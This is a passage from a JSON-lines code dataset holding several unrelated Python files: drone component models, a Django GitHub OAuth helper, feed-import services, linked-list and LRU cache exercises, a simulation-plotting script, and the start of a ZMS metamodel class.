description=\"INPUT_VOLTAGE\", alias=\"INPUT_VOLTAGE\"\n )\n\n barometer_1: str = Field(..., description=\"Barometer_1\", alias=\"Barometer_1\")\n\n spi: float = Field(..., description=\"SPI\", alias=\"SPI\")\n\n fmu_speed: float = Field(..., description=\"FMU_SPEED\", alias=\"FMU_SPEED\")\n\n acc_gyro_2: str = Field(..., description=\"ACC_GYRO2\", alias=\"AccGyro_2\")\n\n pwm_outputs: float = Field(..., description=\"PWM_Outputs\", alias=\"PWM_Outputs\")\n\n pwm_inputs: Optional[float] = Field(\n ..., description=\"PWM_Inputs\", alias=\"PWM_Inputs\"\n )\n\n barometer_2: Optional[str] = Field(\n ..., description=\"Second barometer\", alias=\"Barometer_2\"\n )\n\n fmu_ram: float = Field(..., description=\"FMU_RAM\", alias=\"FMU_RAM\")\n\n adc: float = Field(..., description=\"ADC\", alias=\"ADC\")\n\n length: float = Field(..., description=\"LENGTH\", alias=\"LENGTH\")\n\n io_bits: Optional[float] = Field(..., description=\"IO_Bits\", alias=\"IO_Bits\")\n\n io_processor: Optional[str] = Field(\n ..., description=\"IO_Processor\", alias=\"IO_Processor\"\n )\n\n io_ram: Optional[float] = Field(..., description=\"IO_RAM\", alias=\"IO_RAM\")\n\n io_speed: Optional[float] = Field(..., description=\"IO_SPEED\", alias=\"IO_SPEED\")\n\n @property\n def prt_file(self):\n return None # ToDo: is the the same as FlightController\n\n @validator(\"input_voltage\", pre=True, always=True)\n def validate_input_voltage(cls, value):\n if isinstance(value, str) and \",\" in value:\n value = tuple(float(v) for v in value.split(\",\"))\n return value\n\n @root_validator(pre=True)\n def validate_fields(cls, values):\n if \"Number_of_Tele_ Inputs\" in values:\n values[\"Number_of_Telem_Inputs\"] = values.pop(\"Number_of_Tele_ Inputs\")\n return inject_none_for_missing_fields_and_nans(cls, values)\n\n\nclass Flange(Component):\n od: float = Field(..., description=\"Outer Diameter\", alias=\"OD\")\n\n box: float = Field(..., description=\"Box\", alias=\"BOX\")\n\n clock_angle: Optional[float] = Field(\n None, description=\"The Clock Angle\", alias=\"CLOCK_ANGLE\"\n )\n\n sidemount_offset: Optional[float] = Field(\n None, description=\"The Side Mount Offset\", alias=\"SIDEMOUNT_OFFSET\"\n )\n\n offset: Optional[float] = Field(None, description=\"Offset\", alias=\"OFFSET\")\n\n num_horizontal_conn: Optional[int] = Field(\n None, description=\"The number of horizontal connections\", alias=\"NUMHORZCONN\"\n )\n\n angle_horizontal_connection: Optional[float] = Field(\n None, description=\"The angle of horizontal connections\", alias=\"ANGHORZCONN\"\n )\n\n\nclass Tube(Component):\n length: float = Field(..., description=\"Length of the tube\", alias=\"Length\")\n\n od: float = Field(..., description=\"The outer diameter\", alias=\"OD\")\n\n id: float = Field(..., description=\"The inner diameter\", alias=\"ID\")\n\n rot_2: Optional[float] = Field(\n default=None, description=\"The ROT2 parameter\", alias=\"ROT2\"\n )\n\n\nclass Hub(Component):\n num_of_horizontal_connections: int = Field(\n ..., description=\"The number of horizontal connections\", alias=\"NUMHORZCONN\"\n )\n\n angle_of_horizontal_connections: float = Field(\n ..., description=\"The angle of horizontal connection\", alias=\"ANGHORZCONN:\"\n )\n\n\nclass Orient(Component):\n z_angle: float = Field(..., description=\"The Z-Angle\", alias=\"Z_ANGLE\")\n\n\nclass CarbonFiberPlate(Component):\n width: float = Field(..., description=\"The width of the CFP\", alias=\"WIDTH\")\n\n thickness: float = Field(\n ..., description=\"The Thickness of the plate\", alias=\"THICKNESS\"\n )\n\n density: float = Field(..., description=\"The density of the plate\", alias=\"DENSITY\")\n\n length: float = Field(..., description=\"The Length of the plate\", alias=\"LENGTH\")\n\n x8_offset: float = Field(..., description=\"X8_OFFSET\", alias=\"X8_OFFSET\")\n\n z6_offset: float = Field(..., description=\"Z6_OFFSET\", alias=\"Z6_OFFSET\")\n\n z8_offset: float = Field(..., description=\"Z8_OFFSET\", alias=\"Z8_OFFSET\")\n\n x6_offset: float = Field(..., description=\"X6_OFFSET\", alias=\"X6_OFFSET\")\n\n z7_offset: float = Field(..., description=\"The Z7_OFFSET\", alias=\"Z7_OFFSET\")\n\n z3_offset: float = Field(..., description=\"The Z3_OFFSET\", alias=\"Z3_OFFSET\")\n\n x5_offset: float = Field(..., description=\"X5_OFFSET\", alias=\"X5_OFFSET\")\n\n x2_offset: float = Field(..., description=\"X2_OFFSET\", alias=\"X2_OFFSET\")\n\n x4_offset: float = Field(..., description=\"X4_OFFSET\", alias=\"X4_OFFSET\")\n\n z1_offset: float = Field(..., description=\"Z1_OFFSET\", alias=\"Z1_OFFSET\")\n\n x1_offset: float = Field(..., description=\"X1_OFFSET\", alias=\"X1_OFFSET\")\n\n x3_offset: float = Field(..., description=\"X3_OFFSET\", alias=\"X3_OFFSET\")\n\n z4_offset: float = Field(..., description=\"Z4_OFFSET\", alias=\"Z4_OFFSET\")\n\n x7_offset: float = Field(..., description=\"X7_OFFSET\", alias=\"X7_OFFSET\")\n\n z2_offset: float = Field(..., description=\"Z2_OFFSET\", alias=\"Z2_OFFSET\")\n\n z5_offset: float = Field(..., description=\"Z5_OFFSET\", alias=\"Z5_OFFSET\")\n\n\nclass Beam_Cap(Component):\n thickness: float = Field(..., description=\"Thickness\", alias=\"THICKNESS\")\n\n chord: float = Field(..., alias=\"CHORD\")\n\n\nclass NACA_Port_Connector(Component):\n bottom_connection_disp: float = Field(\n default=0, description=\"BOTTOM_CONNECTION_DISP\", alias=\"BOTTOM_CONNECTION_DISP\"\n )\n\n port_thickness: float = Field(\n default=100, description=\"CHORD\", alias=\"PORT_THICKNESS\"\n )\n\n chord: float = Field(default=500, description=\"CHORD\", alias=\"CHORD\")\n\n thickness: float = Field(default=12, description=\"THICKNESS\", alias=\"THICKNESS\")\n\n\nclass ComponentsRepository:\n \"\"\"The components repository builder class\"\"\"\n\n def __init__(self, creator, components, corpus):\n self.creator = creator\n self.corpus = corpus\n self.components = self._initialize_components(components)\n\n @property\n def all(self):\n return list(self.components.keys())\n\n def __getattr__(self, item):\n if item in self.components:\n return self.components[item]\n else:\n raise AttributeError(\n f\"{self.creator.__name__} {item} is missing from the repository\"\n )\n\n def __getitem__(self, item):\n if isinstance(item, int):\n components = list(self.components.values())\n return components[item]\n else:\n component_names = {\n component.name: component for component in self.components.values()\n }\n\n if item in component_names:\n return component_names[item]\n else:\n raise KeyError(\n f\"{self.creator.__name__} {item} is missing from the repository\"\n )\n\n def __iter__(self):\n for component in self.components.values():\n yield component\n\n def __len__(self):\n return len(self.components)\n\n def to_csv(self, filename):\n \"\"\"Write these components to a csv_file\"\"\"\n keys = {field.alias for _, field in self.creator.__fields__.items()}\n\n if next(iter(self.components.values())).should_swap_aliases():\n reverse_swap_aliases = {\n val: key for key, val in self.creator.__swap_aliases__.items()\n }\n for key in list(keys):\n if key in reverse_swap_aliases:\n keys.remove(key)\n keys.add(reverse_swap_aliases[key])\n\n with open(filename, \"w\", newline=\"\") as op_csv:\n dict_writer = csv.DictWriter(op_csv, keys)\n dict_writer.writeheader()\n for component in self.components.values():\n dict_writer.writerow(component.dict(by_alias=True))\n\n def _initialize_components(self, components):\n component_instances = {}\n\n for component_dict in components:\n object_dict = self._fix_parametric_properties(component_dict)\n object_dict[\"corpus\"] = self.corpus\n component_instance = self.creator.parse_obj(object_dict)\n component_instances[component_instance.name] = component_instance\n\n return component_instances\n\n def _fix_parametric_properties(self, component_dict):\n parametric_properties = {}\n all_properties = {}\n for key, value in component_dict.items():\n if key.startswith(\"para\"):\n splitted = key.split(\"_\")\n parameter_name = \"_\".join(splitted[1:-1])\n if parameter_name not in parametric_properties:\n parametric_properties[parameter_name] = {}\n if splitted[-1] == \"[]AssignedValue\":\n parametric_properties[parameter_name][\"value\"] = value\n if splitted[-1] == \"[]Minimum\":\n parametric_properties[parameter_name][\"min\"] = value\n if splitted[-1] == \"[]Maximum\":\n parametric_properties[parameter_name][\"max\"] = value\n else:\n all_properties[key] = value\n\n assigned_values = dict(\n map(lambda v: (v[0], v[1][\"value\"]), parametric_properties.items())\n )\n\n all_properties.update(assigned_values)\n\n return all_properties\n\n def __repr__(self):\n return f\"<{self.creator.__name__} Library, Count: {self.__len__()}, Corpus: {self.corpus}>\"\n\n\nclass Cylinder(Component):\n wall_thickness: float = Field(default=3.0, alias=\"WALL_THICKNESS\")\n\n left_conn_display: float = Field(default=0.0, alias=\"LEFT_CONN_DISP\")\n\n top_conn_display: float = Field(default=0.0, alias=\"TOP_CONN_DISP\")\n\n right_conn_display: float = Field(default=0.0, alias=\"RIGHT_CONN_DISP\")\n\n bottom_conn_display: float = Field(default=0.0, alias=\"BOTTOM_CONN_DISP\")\n\n diameter: float = Field(default=0.0, alias=\"DIAMETER\")\n\n port_thickness: float = Field(default=100.0, alias=\"PORT_THICKNESS\")\n\n length: float = Field(default=100.0, alias=\"LENGTH\")\n\n front_angle: float = Field(default=1000.0, alias=\"FRONT_ANGLE\")\n\n\nclass Fuselage(Component):\n wall_thickness: float = Field(\n ..., description=\"WALL THICKNESS\", alias=\"WALL_THICKNESS\"\n )\n\n seat_1_lr: float = Field(default=100, description=\"SEAT 1 LR\", alias=\"SEAT_1_LR\")\n\n floor_height: float = Field(\n default=100, description=\"FLOOR HEIGHT\", alias=\"FLOOR_HEIGHT\"\n )\n\n port_thickness: float = Field(\n default=100, description=\"PORT THICKNESS\", alias=\"PORT_THICKNESS\"\n )\n\n middle_length: float = Field(\n default=100, description=\"MIDDLE LENGTH\", alias=\"MIDDLE_LENGTH\"\n )\n\n bottom_port_disp: float = Field(\n default=100, description=\"BOTTOM PORT DISP\", alias=\"BOTTOM_PORT_DISP\"\n )\n\n length: float = Field(default=100, description=\"LENGTH\", alias=\"LENGTH\")\n\n seat_2_fb: float = Field(default=100, description=\"SEAT 2 FB\", alias=\"SEAT_2_FB\")\n\n seat_1_fb: float = Field(default=100, description=\"SEAT 1 FB\", alias=\"SEAT_1_FB\")\n\n seat_2_lr: float = Field(default=100, description=\"SEAT 2 LR\", alias=\"SEAT_2_LR\")\n\n tail_diameter: float = Field(\n default=100, description=\"TAIL DIAMETER\", alias=\"TAIL_DIAMETER\"\n )\n\n sphere_diameter: float = Field(\n default=100, description=\"SPHERE DIAMETER\", alias=\"SPHERE_DIAMETER\"\n )\n\n right_port_disp: float = Field(\n default=100, description=\"RIGHT PORT DISP\", alias=\"RIGHT_PORT_DISP\"\n )\n\n top_port_disp: float = Field(\n default=100, description=\"TOP PORT DISP\", alias=\"TOP_PORT_DISP\"\n )\n\n left_port_disp: float = Field(\n default=100, description=\"LEFT PORT DISP\", alias=\"LEFT_PORT_DISP\"\n )\n\n\nclass Passenger(Component):\n\n weight: float = Field(..., description=\"WEIGHT\", alias=\"WEIGHT\")\n\n\nclass Beam(Component):\n top_conn_disp: float = Field(\n default=0.0, description=\"TOP CONN DISP\", alias=\"TOP_CONN_DISP\"\n )\n\n chord: float = Field(default=500.0, description=\"CHORD\", alias=\"CHORD\")\n\n thickness: float = Field(default=40.0, description=\"THICKNESS\", alias=\"THICKNESS\")\n\n span: float = Field(default=1000.0, description=\"SPAN\", alias=\"SPAN\")\n\n bottom_conn_disp: float = Field(\n default=0.0, description=\"BOTTOM CONN DISP\", alias=\"BOTTOM_CONN_DISP\"\n )\n\n\nclass Cylinder_Flip(Component):\n wall_thickness: float = Field(\n ..., description=\"WALL THICKNESS\", alias=\"WALL_THICKNESS\"\n )\n\n length: float = Field(..., description=\"LENGTH\", alias=\"LENGTH\")\n\n diameter: float = Field(default=0, description=\"DIAMETER\", alias=\"DIAMETER\")\n\n\nall_uav_components = get_data_file_path(\"all_uav_components.json\")\nwith open(all_uav_components) as json_file:\n all_uav_components = json.load(json_file)\n\nall_uam_components = get_data_file_path(\"all_uam_components.json\")\nwith open(all_uam_components) as json_file:\n all_uam_components = json.load(json_file)\n\n\ndef get_corpus_components(corpus):\n if corpus == \"uav\":\n all_components = all_uav_components\n elif corpus == \"uam\":\n all_components = all_uam_components\n else:\n raise ValueError(\"corpus can only be either `uav` or `uam`\")\n return all_components\n\n\ndef get_all_components_of_class(cls, corpus):\n all_components = get_corpus_components(corpus)\n for key, value in all_components.items():\n if value[\"Classification\"] == cls.__name__:\n value[\"Name\"] = key\n yield value\n\n\ndef build_components(cls, corpus):\n return ComponentsRepository(\n creator=cls, components=get_all_components_of_class(cls, corpus), corpus=corpus\n )\n\n\ndef build_components_of_class(cls, names, corpus):\n return ComponentsRepository(\n creator=cls,\n components=(\n {\n \"Name\": comp_name,\n **get_corpus_components(corpus)[comp_name],\n \"Classification\": cls.__name__,\n }\n for comp_name in names\n ),\n corpus=corpus,\n )\n\n\ndef build_tubes(names, corpus):\n for tube_name in names:\n corpus_components = get_corpus_components(corpus)\n if \"para_Length_[]AssignedValue\" not in corpus_components[tube_name]:\n corpus_components[tube_name][\n \"para_Length_[]AssignedValue\"\n ] = corpus_components[tube_name].pop(\"LENGTH\", 200.0)\n\n return build_components_of_class(Tube, names, corpus=corpus)\n","repo_name":"symbench/symbench-athens-client","sub_path":"symbench_athens_client/models/component.py","file_name":"component.py","file_ext":"py","file_size_in_byte":43963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"16133179958","text":"import requests\nimport json\n\nfrom django.conf import settings\n\n\ndef get_github_user_info(access_token):\n url = \"https://api.github.com/user?access_token={token}\".format(token=access_token)\n res = requests.get(url)\n return res.json()\n\n\ndef get_access_token(request):\n code = request.GET['code']\n payload = {\n \"client_id\": settings.SOCIAL_AUTH_GITHUB_KEY,\n \"client_secret\": settings.SOCIAL_AUTH_GITHUB_SECRET,\n \"code\": code,\n }\n headers = {'Content-Type': 'application/json'}\n res = requests.post('https://github.com/login/oauth/access_token',\n data=json.dumps(payload), headers=headers)\n if res.status_code != 200:\n raise Exception(\"Github authentication error\")\n res_params = {k: v for k, v in\n [p.split('=') for p in res.text.split('&')]}\n return res_params['access_token']\n","repo_name":"c-bata/django-auth-example","sub_path":"socials/github.py","file_name":"github.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"70"}
+{"seq_id":"30196333262","text":"from apps.usercategories.models import Category\nfrom apps.userfeeds.models import UserFeed\n\nimport feedfinder2\nimport feedparser\nimport logging\nfrom djangofeeds.models import Feed\nfrom djangofeeds.models import Category as BaseFeedCategory\n\n\nclass FeedWriteService(object):\n\n def __init__(self, user, logger=None, dry_run=False):\n self.logger = logger or logging.getLogger(__name__)\n self.dry_run = dry_run\n self.user = user\n\n def save(self, data):\n return self.rsave([data])\n\n def rsave(self, data):\n \"\"\"\n saves the Information of a FeedInfo object recursively to the database\n :param data: Items to save FeedInfoObject\n \"\"\"\n for item in data:\n if isinstance(item, FeedInfo):\n save_func = self.save_feed\n else:\n save_func = self.save_category\n self.logger.info(\"Saving %s\", item)\n save_func(item)\n\n def save_feed(self, feed_item):\n try:\n feed = Feed.objects.get(feed_url=feed_item.feed_url)\n except Feed.DoesNotExist:\n self.logger.info(\"Feed %s does not exist.\", feed_item.feed_url)\n feed = Feed(\n feed_url=feed_item.feed_url,\n name=feed_item.title\n )\n if not self.dry_run:\n feed.save()\n self.logger.info('Feed saved')\n feed.categories.add(BaseFeedCategory.objects.get(name=UserFeed.default_base_feed_category_name))\n try:\n user_feed = UserFeed.objects.get(feed=feed, user=self.user)\n except UserFeed.DoesNotExist:\n user_feed = UserFeed.objects.create(\n feed=feed,\n user=self.user\n )\n self.logger.info('User feed %s created for %s', feed_item.feed_url, self.user)\n if feed_item.category:\n feed_category = Category.objects.get(name=feed_item.category.name)\n user_feed.categories.add(feed_category)\n if not self.dry_run:\n user_feed.save()\n\n def save_category(self, category_item):\n if not Category.objects.filter(name=category_item.name).exists():\n category = Category(name=category_item.name)\n if not self.dry_run:\n category.save()\n self.rsave(category_item)\n\n\nclass FeedInfo(object):\n def __init__(self,\n feed_type,\n feed_url,\n html_url,\n title,\n category=None\n ):\n self.feed_type = feed_type\n self.feed_url = feed_url\n self.html_url = html_url\n self.title = title\n self.category = category\n\n def __str__(self):\n return self.title\n\n\nclass CategoryInfo(object):\n class CategoryInfoIter(object):\n\n def __init__(self, category_info):\n self._items = category_info._items\n\n def next(self):\n if not hasattr(self, '_iter'):\n self._iter = iter(self._items)\n return self._iter.next()\n\n def __init__(self, name, items=[]):\n super(CategoryInfo, self).__init__()\n self.name = name\n self._items = set()\n for item in items:\n self._items.add(item)\n\n def __iter__(self):\n return CategoryInfo.CategoryInfoIter(self)\n\n def add(self, item):\n self._items.add(item)\n\n def __str__(self):\n return self.name\n\n\nclass FeedInformationService(object):\n\n parse_exception_key = 'bozo_exception'\n\n def __init__(self, feed_url, accept_fuzzy=False):\n self.feed_url = feed_url\n self.accept_fuzzy = accept_fuzzy\n\n def parse(self):\n parse_result = feedparser.parse(self.feed_url)\n if self.accept_fuzzy and FeedInformationService.parse_exception_key in parse_result:\n feeds = feedfinder2.find_feeds(self.feed_url)\n parse_result = map(feedparser.parse, feeds)\n else:\n parse_result = [parse_result]\n\n result = [FeedInfo(\n feed_type=parsed_result['version'],\n feed_url=parsed_result['href'],\n html_url=parsed_result['feed']['link'],\n title=parsed_result['feed']['title']) for parsed_result in parse_result]\n return result\n","repo_name":"jo-soft/jadfr","sub_path":"jadfr/apps/userfeeds/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":4294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"7995443148","text":"\nclass ListNode:\n def __init__(self, val):\n self.val = val\n self.next = None\n\n def __repr__(self):\n if self.next is None:\n return f'{self.val}'\n else:\n return f'{self.val} -> {self.next}'\n\n # return f'{self.val}, {{next:{self.next}}}'\n\n\nclass DoublyListNode:\n def __init__(self, k, v):\n self.key = k\n self.val = v\n self.prev = None\n self.next = None\n\n\nclass MyLinkedList:\n\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self.head = ListNode(None)\n self.tail = self.head\n self.size = 0\n\n def _print_(self):\n p = self.head.next\n while p:\n print(p.val, end=' ')\n p = p.next\n print('')\n\n def get(self, index: int) -> int:\n \"\"\"\n Get the value of the index-th node in the linked list. If the index is invalid, return -1.\n \"\"\"\n print('get', index, self.size)\n self._print_()\n\n if index >= self.size:\n return -1\n i = -1\n p = self.head\n while p:\n p = p.next\n i += 1\n if i == index:\n return p.val\n return -1\n\n def addAtHead(self, val: int) -> None:\n \"\"\"\n Add din node of value val before the first element of the linked list.\n After the insertion, the new node will be the first node of the linked list.\n \"\"\"\n p = ListNode(val)\n p.next = self.head.next\n self.head.next = p\n if self.tail == self.head:\n self.tail = p\n self.size += 1\n\n def addAtTail(self, val: int) -> None:\n \"\"\"\n Append din node of value val to the last element of the linked list.\n \"\"\"\n print('tail=', self.tail.val)\n p = ListNode(val)\n p.next = self.tail.next\n self.tail.next = p\n self.tail = p\n self.size += 1\n self._print_()\n\n def addAtIndex(self, index: int, val: int) -> None:\n \"\"\"\n Add din node of value val before the index-th node in the linked list.\n If index equals to the length of linked list, the node will be appended\n to the end of linked list. If index is greater than the length, the\n node will not be inserted.\n \"\"\"\n if index == self.size:\n self.addAtTail(val)\n elif index < self.size:\n i = -1\n q = p = self.head\n while p:\n q = p\n p = p.next\n i += 1\n if i == index:\n break\n if q:\n node = ListNode(val)\n node.next = q.next\n q.next = node\n if self.tail == self.head:\n self.tail = node\n self.size += 1\n\n def deleteAtIndex(self, index: int) -> None:\n \"\"\"\n Delete the index-th node in the linked list, if the index is valid.\n \"\"\"\n if index < self.size:\n i = -1\n q = p = self.head\n while p:\n q = p\n p = p.next\n i += 1\n if i == index:\n break\n if q and p:\n if p == self.tail:\n self.tail = q\n q.next = p.next\n p.next = None\n del p\n self.size -= 1\n\n\nclass MyDoublyList:\n # used for LRU cache\n def __init__(self):\n self.head = DoublyListNode(None, None)\n self.head.next = self.head\n self.head.prev = self.head\n self.size = 0\n\n def get(self, pt):\n return pt.key, pt.val\n\n def set(self, pt, key=None, val=None):\n if key:\n pt.key = key\n if val:\n pt.val = val\n\n def is_tail(self, pt):\n return pt == self.head.prev and pt != self.head\n\n def pop_head(self):\n if self.head.next != self.head:\n return self.remove(self.head.next)\n return None\n\n def remove(self, pt):\n q = pt.prev\n t = pt.next\n q.next = t\n t.prev = q\n\n pt.next = None\n pt.prev = None\n self.size -= 1\n return pt\n\n def insert(self, pt):\n pt.next = self.head\n pt.prev = self.head.prev\n self.head.prev = pt\n pt.prev.next = pt\n self.size += 1\n return pt\n\n def print(self):\n p = self.head.next\n while p != self.head:\n print(\"[%s:%s]->\" % (p.key, p.val), end='')\n p = p.next\n print('Null')\n\n\nclass LRUCache:\n def __init__(self, capacity: int):\n self.capacity = capacity\n self.cache = MyDoublyList()\n self.key_to_ptr = {}\n\n def get(self, key: int) -> int:\n p = self.key_to_ptr.get(key, None)\n if not p:\n return -1\n if not self.cache.is_tail(p):\n p = self.cache.remove(p)\n self.cache.insert(p)\n return p.val\n\n def put(self, key: int, value: int) -> None:\n p = self.key_to_ptr.get(key, None)\n if p:\n if not self.cache.is_tail(p):\n p = self.cache.remove(p)\n self.cache.insert(p)\n self.cache.set(p, key=p.key, val=value)\n else:\n if self.cache.size >= self.capacity:\n pt = self.cache.pop_head()\n self.key_to_ptr.pop(pt.key)\n if pt:\n del pt\n p = DoublyListNode(key, v=value)\n self.cache.insert(p)\n self.key_to_ptr[key] = p\n\n\nclass Solution_92:\n def reverseBetween(self, head, m, n):\n\n if m == n:\n return head\n new_head = ListNode(None)\n new_head.next = head\n prev = q = p = new_head\n cnt = 0\n while p and cnt <= n:\n\n if cnt < m:\n prev = q = p\n p = p.next\n elif cnt <= n:\n t = p.next\n p.next = q\n q = p\n p = t\n cnt += 1\n\n prev.next.next = p\n prev.next = q\n\n return new_head.next\n\n\nclass Solution_147:\n # 链表插入排序\n\n def insertionSortList(self, head: ListNode) -> ListNode:\n if not head:\n return head\n\n dummy = prev = ListNode(float('-inf'))\n dummy.next = head\n\n while head and head.next:\n if head.val <= head.next.val:\n head = head.next\n else:\n p = head.next\n t = head.next.next\n head.next = t # 把head.next从链上取下\n while p.val > prev.next.val:\n prev = prev.next\n\n next_prev = prev.next\n prev.next = p\n p.next = next_prev\n prev = dummy\n\n return dummy.next\n\n\nclass Solution_25:\n def reverseKGroup(self, head: ListNode, k: int) -> ListNode:\n # constant space, do it in-place\n def _reverse(h):\n cur = h.next\n prev = h\n h.next = None\n while cur:\n next_node = cur.next\n cur.next = prev\n\n prev = cur\n cur = next_node\n return prev, h\n # reverse k-Group\n # last_tail.next = cur_head\n dummy = last_tail = ListNode(None)\n p = head\n h = head\n cnt = 0\n while p:\n cnt += 1\n if cnt == k:\n tmp = p.next\n p.next = None\n h, t = _reverse(h)\n last_tail.next = h\n last_tail = t\n\n h = tmp\n cnt = 0\n p = h\n else:\n p = p.next\n if cnt > 0:\n last_tail.next = h\n return dummy.next\n\n\n# class used by 138\nclass Node:\n def __init__(self, val, next, random):\n self.val = val\n self.next = next\n self.random = random\n\n\nclass Solution_138:\n def copyRandomList(self, head: 'Node') -> 'Node':\n if not head:\n return None\n p = head\n while p:\n np = Node(p.val, None, None)\n t = p.next\n p.next = np\n np.next = t\n p = np.next\n\n p = head\n while p:\n np = p.next\n if p.random:\n # print(p,np)\n np.random = p.random.next\n p = np.next\n p = head\n np_head = head.next\n while p:\n np = p.next\n p.next = np.next\n if p.next:\n np.next = p.next.next\n else:\n np.next = None\n p = p.next\n return np_head","repo_name":"hughian/OJ","sub_path":"LeetCode/LeetCode/LinkedList.py","file_name":"LinkedList.py","file_ext":"py","file_size_in_byte":8745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"39122490392","text":"import os\nimport subprocess\nimport matplotlib.pyplot as plt\nfrom multiprocessing import Pool, Manager\nfrom simulation import *\n\n\nif __name__ == \"__main__\":\n manager = Manager()\n # Declare the configurations\n migration_modes_join = [\"no-migration\", \"all-at-once\", \"lazy\"]\n migration_modes_aggregation = [\"no-migration\", \"all-at-once\", \"megaphone\", \"meces\", \"lazy\"]\n migration_modes_join_aggregation = [\"no-migration\", \"all-at-once\", \"megaphone\", \"meces\", \"lazy\"]\n migration_modes_join_aggregation_max_utility = [\"no-migration\", \"utility\", \"lazy\"]\n tuples_numbers = [1, 10, 100, 1000, 10000]\n window_jump_times = [100, 500, 1000, 5000, 10000]\n proportion_joinable_tuples = [0.001, 0.1, 0.4, 1]\n batch_size = 1\n number_window_extents = 100\n\n # Run Id counter\n run_id_counter = 1\n\n # Declare the YAML configuration files\n yaml_files = ['join-test.yaml', 'aggregation-test.yaml', 'join-and-aggregation-test.yaml',\n 'join-and-aggregation-test.yaml', 'join-and-aggregation-max-utility-test.yaml']\n\n # Process each type of query separately\n queries = ['Join Query', 'Timed Aggregation Query', 'Join -> Timed Aggregation Query (Minimize Latency)',\n 'Join -> Timed Aggregation Query (Minimize Latency)',\n 'Join -> Timed Aggregation Query (Maximize Utility)']\n configs = [migration_modes_join, migration_modes_aggregation, migration_modes_join_aggregation,\n migration_modes_join_aggregation, migration_modes_join_aggregation_max_utility]\n x_params = ['percentage-A-tuples-join', 'tuples-between-join', 'time-between-B-tuples', 'percentage-A-tuples-join']\n x_values = [proportion_joinable_tuples, window_jump_times, proportion_joinable_tuples, window_jump_times,\n proportion_joinable_tuples]\n\n # Create dictionaries to store latency and deviation results\n latency_results = manager.dict()\n deviation_results = manager.dict()\n\n results_path = f\"expose/Results/raw-data\"\n\n no_migration_latency_results = manager.dict()\n no_migration_deviation_results = manager.dict()\n\n pool = Pool()\n manager = Manager()\n run_id_counter = 1 # Initialize run ID counter\n async_results = [] # Store the AsyncResult objects here\n for query, migration_modes, x_param, x_values, yaml_file in zip(queries, configs, x_params, x_values, yaml_files):\n data_by_migration_mode = manager.dict()\n\n # For each x_value, run the simulations for all migration modes\n for x_value in x_values:\n # First, run the no-migration case\n simulation_args = (\n query, \"no-migration\", x_value, x_param, yaml_file, run_id_counter, results_path, latency_results,\n deviation_results, no_migration_latency_results, no_migration_deviation_results, data_by_migration_mode\n )\n print(\"Before pool.apply\")\n async_result = pool.apply_async(run_simulation, (simulation_args,))\n async_results.append(async_result)\n print(\"After pool.apply\")\n\n # Call get() on each AsyncResult to wait for the tasks to complete\n for async_result in async_results:\n async_result.get()\n\n # Then, run the other migration modes\n for migration_mode in migration_modes:\n if migration_mode != \"no-migration\":\n simulation_args = (\n query, migration_mode, x_value, x_param, yaml_file, run_id_counter, results_path, latency_results,\n deviation_results, no_migration_latency_results, no_migration_deviation_results,\n data_by_migration_mode)\n async_result = pool.apply_async(run_simulation, (simulation_args,))\n async_results.append(async_result)\n # Call get() on each AsyncResult to wait for the tasks to complete\n for async_result in async_results:\n async_result.get()\n\n # After all simulations for this x_value, plot the results\n for result_type, results_dict, y_label in [(\"latency\", latency_results, 'Average Latency'),\n (\"deviation\", deviation_results, 'Average Deviation')]:\n plt.figure()\n for migration_mode in migration_modes:\n # Get the results for this migration mode\n results = results_dict[migration_mode]\n # Create lists of x values and y_values\n x_values = sorted(results.keys())\n y_values = [results[x] for x in x_values]\n plt.plot(x_values, y_values, label=migration_mode)\n\n plt.title(f'Average {result_type.capitalize()} for {query} and Different Migration Modes')\n plt.xlabel(x_param)\n plt.ylabel(y_label)\n plt.legend()\n plt.savefig(f\"{results_path}/{result_type}_{query.replace(' ', '_')}_{run_id_counter}.png\")\n plt.close()\n\n # Increment the run ID counter after all migration modes have been simulated for the current x_value\n run_id_counter += 1\n\n pool.close()\n","repo_name":"espv/DCEP-Sim","sub_path":"scripts/lazy-results-analysis-multithreaded.py","file_name":"lazy-results-analysis-multithreaded.py","file_ext":"py","file_size_in_byte":5248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"24015560609","text":"################################################################################\r\n# ZMSMetamodelProvider.py\r\n#\r\n# This program is free software; you can redistribute it and/or\r\n# modify it under the terms of the GNU General Public License\r\n# as published by the Free Software Foundation; either version 2\r\n# of the License, or (at your option) any later version.\r\n#\r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU General Public License\r\n# along with this program; if not, write to the Free Software\r\n# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.\r\n################################################################################\r\n\r\n\r\n# Imports.\r\nfrom Products.PageTemplates.PageTemplateFile import PageTemplateFile\r\nimport copy\r\nfrom zope.interface import implementer\r\n# Product Imports.\r\nfrom Products.zms import standard\r\nfrom Products.zms import IZMSConfigurationProvider, IZMSRepositoryProvider\r\nfrom Products.zms import IZMSMetamodelProvider, ZMSMetaobjManager, ZMSMetadictManager\r\nfrom Products.zms import ZMSItem\r\n\r\n\r\n################################################################################\r\n################################################################################\r\n###\r\n### Class\r\n###\r\n################################################################################\r\n################################################################################\r\n@implementer(\r\n IZMSConfigurationProvider.IZMSConfigurationProvider,\r\n IZMSMetamodelProvider.IZMSMetamodelProvider,\r\n IZMSRepositoryProvider.IZMSRepositoryProvider,)\r\nclass ZMSMetamodelProvider(\r\n ZMSItem.ZMSItem,\r\n ZMSMetaobjManager.ZMSMetaobjManager,\r\n ZMSMetadictManager.ZMSMetadictManager):\r\n\r\n # Properties.\r\n # -----------\r\n meta_type = 'ZMSMetamodelProvider'\r\n icon_clazz = \"icon-briefcase\"\r\n\r\n # Management Options.\r\n # -------------------\r\n manage_options_default_action = '../manage_customize'\r\n def 